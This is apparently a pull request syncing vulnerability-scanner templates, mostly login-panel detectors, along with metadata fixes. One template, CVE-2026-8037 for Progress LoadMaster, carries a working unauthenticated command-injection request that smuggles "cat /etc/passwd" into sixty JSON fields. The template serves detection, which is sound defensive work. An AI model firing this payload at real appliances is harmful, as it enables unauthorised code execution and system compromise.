### PR TITLE
upstream sync (semantic): changes requiring review

### DIFF
--- a/http/cves/2026/CVE-2026-8037.yaml
+++ b/http/cves/2026/CVE-2026-8037.yaml
@@ -1,0 +1,43 @@
+id: CVE-2026-8037
+info:
+  name: Progress ADC LoadMaster - Command Injection
+  author: watchtowr,DhiyaneshDk
+  severity: critical
+  description: |
+    OS Command Injection Remote Code Execution Vulnerability in API in Progress ADC Products allows an un-authenticated attacker to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in multiple command endpoints
+  impact: |
+    Unauthenticated attackers can execute arbitrary commands on the LoadMaster appliance, potentially leading to full system compromise.
+  remediation: |
+    Update to the latest version of Progress ADC LoadMaster.
+  reference:
+    - https://community.progress.com/s/article/LoadMaster-Critical-Security-Bulletin-June-2026-CVE-2026-8037-CVE-2026-33691
+    - https://labs.watchtowr.com/enterprise-tech-in-shell-out-progress-kemp-loadmaster-uninitialized-heap-to-pre-auth-rce-cve-2026-8037/
+  metadata:
+    runzero-match: service["http.body"] matches "Progress"
+    fofa-query: body="Progress" && icon_hash=="-2107233094"
+    max-request: 1
+    verified: false
+  tags: cve,cve2026,loadmaster,progress,rce,vkev
+http:
+  - raw:
+      - |
+        POST /accessv2 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Accept: */*
+
+        {"cmd": "getall", "apiuser": "''''", "apipass": "BBBBB", "g0": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g1": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g2": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g3": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g4": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g5": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g6": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g7": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g8": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g9": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g10": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g11": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g12": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g13": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g14": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g15": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g16": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g17": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g18": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g19": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g20": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g21": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g22": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g23": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g24": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g25": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g26": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g27": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g28": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g29": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g30": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g31": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g32": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g33": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g34": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g35": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g36": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g37": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g38": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g39": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g40": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g41": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g42": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g43": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g44": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g45": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g46": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g47": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g48": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g49": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g50": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g51": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g52": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g53": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g54": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g55": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g56": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g57": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g58": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g59": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #", "g60": "AAAAAAAAAAAAAAAA'; cat /etc/passwd #"}
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: response
+        words:
+          - "root:x:0:0:"
+      - type: word
+        part: content_type
+        words:
+          - "text/json"
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a0048304602210099944ccb160b5a7f204791a02a4452161515a71fcd914232105cfcd1ad52f964022100ccd1dc9e3451b196e74c8993714e0db763324aa6e623f71f6fc6fa3d6cb08ca7:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-8037.yaml
+++ b/http/cves/2026/CVE-2026-8037.yaml
@@ -13,7 +13,7 @@ info:
     - https://community.progress.com/s/article/LoadMaster-Critical-Security-Bulletin-June-2026-CVE-2026-8037-CVE-2026-33691
     - https://labs.watchtowr.com/enterprise-tech-in-shell-out-progress-kemp-loadmaster-uninitialized-heap-to-pre-auth-rce-cve-2026-8037/
   metadata:
-    runzero-match: service["http.body"] matches "Progress"
+    runzero-match: service["favicon.ico.image.mmh3"] == "-2107233094" || service["http.body"] matches "(?i)kemp loadmaster"
     fofa-query: body="Progress" && icon_hash=="-2107233094"
     max-request: 1
     verified: false

--- a/http/exposed-panels/avaya/avaya-aura-communication-manager-panel.yaml
+++ b/http/exposed-panels/avaya/avaya-aura-communication-manager-panel.yaml
@@ -1,0 +1,32 @@
+id: avaya-aura-communication-manager-panel
+info:
+  name: Avaya Aura Communication Manager Login - Panel Detect
+  author: princechaddha
+  severity: info
+  description: Avaya Aura Communication Manager login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+    cpe: cpe:2.3:a:avaya:aura_communication_manager:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: service["product"] matches "(?i)avaya.aura.communication.manager"
+    max-request: 1
+    product: aura_communication_manager
+    vendor: avaya
+  tags: avaya,discovery,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/common/login/webLogin"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Avaya Aura"
+          - "Communication Manager (CM)"
+        condition: and
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a00473045022100cc805cb2bf58ad6f95e8745eddd8d7561af7fe09d7f52c3a80be57bd1b97e7460220761a5dbde87ecfce588758f30b11b614a2d6792082ed1638eb07c9ddaf1eadd0:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/avaya/avaya-aura-communication-manager-panel.yaml
+++ b/http/exposed-panels/avaya/avaya-aura-communication-manager-panel.yaml
@@ -9,7 +9,7 @@ info:
     cwe-id: CWE-200
     cpe: cpe:2.3:a:avaya:aura_communication_manager:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: service["product"] matches "(?i)avaya.aura.communication.manager"
+    runzero-match: service["http.body"] matches "Avaya Aura"
     max-request: 1
     product: aura_communication_manager
     vendor: avaya

--- a/http/exposed-panels/checkmk/checkmarx-cxsast-panel.yaml
+++ b/http/exposed-panels/checkmk/checkmarx-cxsast-panel.yaml
@@ -1,0 +1,41 @@
+id: checkmarx-cxsast-panel
+info:
+  name: Checkmarx CxSAST Login Panel - Detect
+  author: joanbonon,righettod
+  severity: info
+  description: |
+    Checkmarx CxSAST login panel was detected.
+  reference:
+    - https://docs.checkmarx.com/en/34965-44074-checkmarx-sast.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+    cpe: cpe:2.3:a:checkmarx:cxsast:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: service["http.body"] matches "CxSASTManagerUri"
+    max-request: 3
+    product: cxsast
+    shodan-query: http.html:"CxSASTManagerUri"
+    vendor: checkmarx
+    verified: true
+  tags: checkmarx,cxsast,detect,discovery,login,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cxrestapi/help/system/version"
+      - "{{BaseURL}}/cxwebclient/Login.aspx"
+      - "{{BaseURL}}/cxrestapi/auth/identity/.well-known/openid-configuration"
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(to_lower(body), "cxsastmanageruri", "cxauthorityconfigurations", "/cxwebclient/webapp/", "sast_api", "sast_rest_api" , "sast-permissions", "hotfix")'
+        condition: and
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '(?i)"version":\s*"([0-9.]+)"'
+        # digest: 4a0a0047304502204f9b3b8ed648f132492d88a35f140703a886a0dd3f8b0a95bd63a5eb3f3cf03c022100a57d43bb53f587f1717bf4b791d98475c1126c6c3de8fd05b0dcbfb70e629a15:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/cisco/cisco-ace-4710-device-manager.yaml
+++ b/http/exposed-panels/cisco/cisco-ace-4710-device-manager.yaml
@@ -9,7 +9,7 @@ info:
     cwe-id: CWE-200
     cpe: cpe:2.3:h:cisco:ace_4710_application_control_engine:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: service["http.body"] matches "ACE 4710 Device Manager"
+    runzero-match: any(each(service["html.titles"]), {# matches "^ACE 4710 DM - Login$"})
     max-request: 1
     product: ace_4710_application_control_engine
     shodan-query: html:"ACE 4710 Device Manager"

--- a/http/exposed-panels/cisco/cisco-ace-4710-device-manager.yaml
+++ b/http/exposed-panels/cisco/cisco-ace-4710-device-manager.yaml
@@ -1,0 +1,31 @@
+id: cisco-ace-4710-device-manager
+info:
+  name: Cisco ACE 4710 Device Manager Login Panel - Detect
+  author: dhiyaneshDk
+  severity: info
+  description: Cisco ACE 4710 Device Manager login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+    cpe: cpe:2.3:h:cisco:ace_4710_application_control_engine:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: service["http.body"] matches "ACE 4710 Device Manager"
+    max-request: 1
+    product: ace_4710_application_control_engine
+    shodan-query: html:"ACE 4710 Device Manager"
+    vendor: cisco
+  tags: cisco,discovery,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.vm"
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>ACE 4710 DM - Login</title>"
+      - type: status
+        status:
+          - 200
+        # digest: 4a0a0047304502205464829cb6f06729aaae86b4cbd6f4f386bdf52b50c583973ed16a781a82563e022100e602dafb0e1342358f4dc95924d907a10e40efe9bf30df5750f4e74cca66064b:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/cisco/cisco-servicegrid.yaml
+++ b/http/exposed-panels/cisco/cisco-servicegrid.yaml
@@ -1,0 +1,33 @@
+id: cisco-servicegrid
+info:
+  name: Cisco ServiceGrid Login Panel - Detect
+  author: dhiyaneshDK
+  severity: info
+  description: Cisco ServiceGrid login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Cisco ServiceGrid"})
+    max-request: 1
+    shodan-query: http.title:"Cisco ServiceGrid"
+  tags: cisco,discovery,eol,panel,servicegrid
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/pages/sdcall/Login.jsp'
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$'
+      - type: status
+        status:
+          - 200
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<div class="top\-margin">Version ([0-9.]+)<\/div>'
+        # digest: 490a00463044022045e4a65ff9fc6760ee89027bce7fe16c4bc29a517e2e17ace15d7891b33c244602202504b349d255f86e1c745f269e5d7d5eadf77272cdf10423edfbbb88124d686f:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/cisco/cisco-servicegrid.yaml
+++ b/http/exposed-panels/cisco/cisco-servicegrid.yaml
@@ -8,7 +8,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
     cwe-id: CWE-200
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Cisco ServiceGrid"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Cisco ServiceGrid"})
     max-request: 1
     shodan-query: http.title:"Cisco ServiceGrid"
   tags: cisco,discovery,eol,panel,servicegrid

--- a/http/exposed-panels/cisco/cisco-telepresence-mcu-panel.yaml
+++ b/http/exposed-panels/cisco/cisco-telepresence-mcu-panel.yaml
@@ -1,0 +1,35 @@
+id: cisco-telepresence-mcu-panel
+info:
+  name: Cisco TelePresence MCU Login Panel - Detect
+  author: dhiyaneshDk
+  severity: info
+  description: |
+    Cisco TelePresence MCU login panel was detected.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+    cpe: cpe:2.3:a:cisco:telepresence_mcu_software:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "Cisco Telepresence"})
+    max-request: 1
+    product: telepresence_mcu_software
+    shodan-query: http.title:"Cisco Telepresence"
+    vendor: cisco
+    verified: true
+  tags: cisco,discovery,panel,telepresence-mcu
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login.html"
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Cisco TelePresence MCU - login:"
+      - type: status
+        status:
+          - 200
+        # digest: 4b0a00483046022100eae001dd5e7ec08a29715cfb742a7aa58c4a50ff827265f1211855732dbc6073022100a46ccaeb3cdafbe9f38d5c0faaa3ec1fab226c62093a5a4cce8667cdb99e92a6:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/cisco/cisco-telepresence-mcu-panel.yaml
+++ b/http/exposed-panels/cisco/cisco-telepresence-mcu-panel.yaml
@@ -10,7 +10,7 @@ info:
     cwe-id: CWE-200
     cpe: cpe:2.3:a:cisco:telepresence_mcu_software:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "Cisco Telepresence"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^Cisco Telepresence"})
     max-request: 1
     product: telepresence_mcu_software
     shodan-query: http.title:"Cisco Telepresence"

--- a/http/exposed-panels/fortinet/fortiadc-panel.yaml
+++ b/http/exposed-panels/fortinet/fortiadc-panel.yaml
@@ -11,7 +11,7 @@ info:
     cwe-id: CWE-200
     cpe: cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "FortiADC"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^FortiADC$"})
     fofa-query: title="fortiadc"
     google-query: intitle:"fortiadc"
     max-request: 1

--- a/http/exposed-panels/fortinet/fortiadc-panel.yaml
+++ b/http/exposed-panels/fortinet/fortiadc-panel.yaml
@@ -1,0 +1,41 @@
+id: fortiadc-panel
+info:
+  name: FortiADC Login Panel - Detect
+  author: DhiyaneshDk
+  severity: info
+  description: FortiADC login panel was detected.
+  reference:
+    - https://www.fortinet.com/products/application-delivery-controller/fortiadc
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+    cwe-id: CWE-200
+    cpe: cpe:2.3:a:fortinet:fortiadc:*:*:*:*:*:*:*:*
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "FortiADC"})
+    fofa-query: title="fortiadc"
+    google-query: intitle:"fortiadc"
+    max-request: 1
+    product: fortiadc
+    shodan-query:
+      - title:"FortiADC"
+      - http.title:"fortiadc"
+    vendor: fortinet
+    verified: true
+  tags: discovery,fortinet,panel
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ui/#navigate/Login"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>FortiADC</title>"
+      - type: word
+        part: header
+        words:
+          - "text/html"
+      - type: status
+        status:
+          - 200
+# digest: 4b0a00483046022100a1c1019fd53fc656f2d83d7c4326d683cd52f87c7cc048be4152ae9cc65c3319022100f4b2c4cbfe49007a328b70e08fa67733c19bbcbeecc5a52accc329f2adcd5891:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/sma-opcon-panel.yaml
+++ b/http/exposed-panels/sma-opcon-panel.yaml
@@ -1,0 +1,33 @@
+id: sma-opcon-panel
+info:
+  name: SMA OpCon Panel - Detect
+  author: righettod
+  severity: info
+  description: |
+    SMA OpCon was detected — a workload automation and orchestration software.
+  reference:
+    - https://smatechnologies.com/product-opcon
+  metadata:
+    runzero-match: any(each(service["html.titles"]), {# matches "SMA OpCon"})
+    max-request: 2
+    shodan-query: http.title:"SMA OpCon"
+    verified: true
+  tags: discovery,login,panel,sma
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/version"
+      - "{{BaseURL}}/login"
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_any(to_lower(body), "<title>sma opcon solution manager</title>", "content=\"sma opcon solution manager\"", "\"opconrestapiproductversion\":")'
+        condition: and
+    extractors:
+      - type: json
+        part: body
+        json:
+          - '.opConRestApiProductVersion'
+        # digest: 490a0046304402204174bef92c8e77fb58735977f796806ef9a96d531cbf3b64c4f126333cf6300302205859b4fb2a5ef90b1c295e1d2235f78c2140c859b4b617dd642eb37663fa1bd4:922c64590222798bb761d5b6d8e72950

--- a/http/exposed-panels/sma-opcon-panel.yaml
+++ b/http/exposed-panels/sma-opcon-panel.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://smatechnologies.com/product-opcon
   metadata:
-    runzero-match: any(each(service["html.titles"]), {# matches "SMA OpCon"})
+    runzero-match: any(each(service["html.titles"]), {# matches "^SMA OpCon Solution Manager$"})
     max-request: 2
     shodan-query: http.title:"SMA OpCon"
     verified: true


### PR DESCRIPTION
## Upstream Sync — Semantic Changes

> Targets the general branch. Review before merging.

### New templates — auto-generated match (8)

| Template | Severity | Notable tags | Note |
|---|---|---|---|
| `http/exposed-panels/cisco/cisco-ace-4710-device-manager.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/cisco/cisco-telepresence-mcu-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/fortinet/fortiadc-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/checkmk/checkmarx-cxsast-panel.yaml` | ⚪ info | panel, login | — |
| `http/cves/2026/CVE-2026-8037.yaml` | 🔴 critical | vkev | — |
| `http/exposed-panels/avaya/avaya-aura-communication-manager-panel.yaml` | ⚪ info | panel | — |
| `http/exposed-panels/sma-opcon-panel.yaml` | ⚪ info | panel, login | — |
| `http/exposed-panels/cisco/cisco-servicegrid.yaml` | ⚪ info | panel | — |

### Removed templates with active `runzero-match` (9)

| Template |
|---|
| `http/exposed-panels/mybb/mybb-forum-install.yaml` |
| `http/exposed-panels/forti/fortiadc-panel.yaml` |
| `http/exposed-panels/cisco/cisco-sendgrid.yaml` |
| `http/exposed-panels/cisco/cisco-ace-device-manager.yaml` |
| `http/exposed-panels/cisco/cisco-telepresence.yaml` |
| `http/exposed-panels/checkmk/checkmarx-panel.yaml` |
| `http/exposed-panels/osticket/osticket-install.yaml` |
| `http/exposed-panels/dzzoffice/dzzoffice-install.yaml` |
| `http/exposed-panels/concrete5/concrete5-install.yaml` |

---

### ⚠️ Action items (17)

- [x] `http/cves/2026/CVE-2026-8037.yaml` — auto-generated `runzero-match` (vkev critical); please verify
- [x] `http/exposed-panels/avaya/avaya-aura-communication-manager-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/checkmk/checkmarx-cxsast-panel.yaml` — auto-generated `runzero-match` (panel, login info); please verify
- [x] `http/exposed-panels/cisco/cisco-ace-4710-device-manager.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/cisco/cisco-servicegrid.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/cisco/cisco-telepresence-mcu-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/fortinet/fortiadc-panel.yaml` — auto-generated `runzero-match` (panel info); please verify
- [x] `http/exposed-panels/sma-opcon-panel.yaml` — auto-generated `runzero-match` (panel, login info); please verify
- [x] ⚠️ `http/exposed-panels/checkmk/checkmarx-panel.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/cisco/cisco-ace-device-manager.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/cisco/cisco-sendgrid.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/cisco/cisco-telepresence.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/concrete5/concrete5-install.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/dzzoffice/dzzoffice-install.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/forti/fortiadc-panel.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/mybb/mybb-forum-install.yaml` — removed upstream; had active `runzero-match`
- [x] ⚠️ `http/exposed-panels/osticket/osticket-install.yaml` — removed upstream; had active `runzero-match`
